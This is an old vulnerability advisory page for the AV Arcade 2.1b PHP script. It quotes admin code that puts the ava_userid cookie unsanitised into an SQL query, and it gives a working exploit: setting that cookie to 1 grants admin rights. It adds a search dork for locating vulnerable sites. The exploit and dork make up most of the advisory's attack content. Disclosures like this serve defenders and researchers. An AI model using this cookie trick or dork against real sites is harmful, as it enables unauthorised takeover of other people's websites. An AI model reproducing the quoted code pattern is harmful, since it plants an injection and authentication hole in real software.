AV Arcade 2.1b (COOKIE[ava_userid]) Get Admin Rights

2007.07.11
Credit: Kw3rLn
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

AV Arcade 2.1b (COOKIE[ava_userid]) Get Admin Rights Web: AV Arcade 2.1b Site : www.avscripts.net Dork : "Powered By AV Arcade" Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ] Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET Vurnerable code: admin/index.php: $sql = mysql_query("SELECT * FROM ava_users WHERE id=".$_COOKIE['ava_userid'].""); while($row = mysql_fetch_array($sql)){ if ($row['admin'] == 1) { define( 'ADMIN_ACCESS', 1 ); [...] Exploit: Set in your cookies: ava_userid = 1; and that`s all :p GREETZ: all memberz of RST and milw0rm //kw3rln [ http://rstzone.net ] [EOF]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top